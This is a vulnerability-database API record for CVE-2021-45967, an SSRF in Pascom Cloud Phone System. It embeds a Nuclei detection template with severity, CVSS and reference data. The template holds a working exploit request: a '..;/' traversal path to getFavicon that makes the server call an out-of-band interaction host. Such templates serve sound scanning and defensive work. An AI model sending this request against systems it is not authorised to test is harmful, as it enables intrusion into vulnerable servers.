{
  "_links": {
    "capec": {
      "href": "/api/v1/vulnerability/cve-2021-45967/capec"
    },
    "cvss": {
      "href": "/api/v1/vulnerability/cve-2021-45967/cvss"
    },
    "cwe": {
      "href": "/api/v1/vulnerability/cve-2021-45967/cwe"
    },
    "enrichment": {
      "href": "/api/v1/vulnerability/cve-2021-45967/enrichment"
    },
    "gcve": {
      "href": "/api/v1/vulnerability/cve-2021-45967/gcve"
    },
    "self": {
      "href": "/api/v1/vulnerability/cve-2021-45967"
    },
    "sightings": {
      "href": "/api/v1/sightings/cve-2021-45967"
    }
  },
  "data": {
    "nuclei": true,
    "nuclei_template": "http/cves/2021/CVE-2021-45967.yaml",
    "nuclei_template_severity": "critical",
    "nuclei_template_yaml": "id: CVE-2021-45967\n\ninfo:\n  name: Pascom CPS Server-Side Request Forgery\n  author: dwisiswant0\n  severity: critical\n  description: Pascom versions before 7.20 packaged with Cloud Phone System contain a known server-side request forgery vulnerability.\n  impact: |\n    The vulnerability can result in unauthorized access to sensitive data or systems, potentially leading to further exploitation or compromise.\n  remediation: |\n    Apply the latest security patches or updates provided by Pascom to fix the Server-Side Request Forgery vulnerability (CVE-2021-45967).\n  reference:\n    - https://kerbit.io/research/read/blog/4\n    - https://www.pascom.net/doc/en/release-notes/\n    - https://tutorialboy24.blogspot.com/2022/03/the-story-of-3-bugs-that-lead-to.html\n    - https://www.pascom.net/doc/en/release-notes/pascom19/\n    - https://github.com/ARPSyndicate/cvemon\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n    cvss-score: 9.8\n    cve-id: CVE-2021-45967\n    cwe-id: CWE-22\n    epss-score: 0.208\n    epss-percentile: 0.97464\n    cpe: cpe:2.3:a:pascom:cloud_phone_system:*:*:*:*:*:*:*:*\n  metadata:\n    max-request: 1\n    vendor: pascom\n    product: cloud_phone_system\n  tags: cve,cve2021,pascom,ssrf,pascom_cloud_phone_system,vkev,vuln\n\nhttp:\n  - method: GET\n    path:\n      - \"{{BaseURL}}/services/pluginscript/..;/..;/..;/getFavicon?host={{interactsh-url}}\"\n\n    matchers-condition: and\n    matchers:\n      - type: word\n        part: interactsh_protocol # Confirms the HTTP Interaction\n        words:\n          - \"http\"\n\n      - type: status\n        status:\n          - 200\n# digest: 4b0a004830460221008a3a1f9701e01ec508efd5f235efc9ed553777f9fe19dba9704a685c1cdbeabf022100e281a1e75c19f3689ca0972c5092569c13815affc40864217ebbec6fb8c6a692:922c64590222798bb761d5b6d8e72950"
  },
  "source": "nuclei",
  "vuln_id": "cve-2021-45967"
}